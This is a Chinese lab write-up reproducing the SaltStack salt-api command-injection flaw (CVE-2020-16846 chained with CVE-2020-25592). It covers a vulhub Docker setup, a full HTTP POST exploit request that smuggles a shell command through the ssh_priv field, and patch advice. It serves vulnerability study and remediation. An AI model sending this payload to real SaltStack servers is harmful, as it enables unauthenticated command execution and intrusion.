简介

SaltStack是一个分布式运维系统，在互联网场景中被广泛应用

漏洞简介

CVE-2020-16846和CVE-2020-25592组合使用可在未授权的情况下通过salt-api接口执行任意命令。CVE-2020-25592允许任意用户调用SSH模块，CVE-2020-16846允许用户执行任意命令。

影响版本

SaltStack 2015/2016/2017/2018/2019/3000/3001/3002

环境搭建

这里使用docker进行安装

下载地址：

https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846

进入目录

vulhub-master/saltstack/CVE-2020-16846

启动环境

docker-compose up -d

访问https://your-ip:8000/

漏洞复现

发送数据包来创建文件

POST /run HTTP/1.1

Host: 192.168.204.131:8000

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: application/x-yaml

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 87



token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/success%3b

touch文件成功

修复建议

补丁下载链接：

https://gitlab.com/saltstack/open/salt-patches

从SaltStack官方下载安全软件版本

下载地址：

https://repo.saltstack.com/

最后

以上就是英勇大地为你收集整理的SaltStack Shell 注入 (CVE-2020-16846)漏洞复现简介漏洞简介影响版本环境搭建漏洞复现修复建议的全部内容，希望文章能够帮你解决SaltStack Shell 注入 (CVE-2020-16846)漏洞复现简介漏洞简介影响版本环境搭建漏洞复现修复建议所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。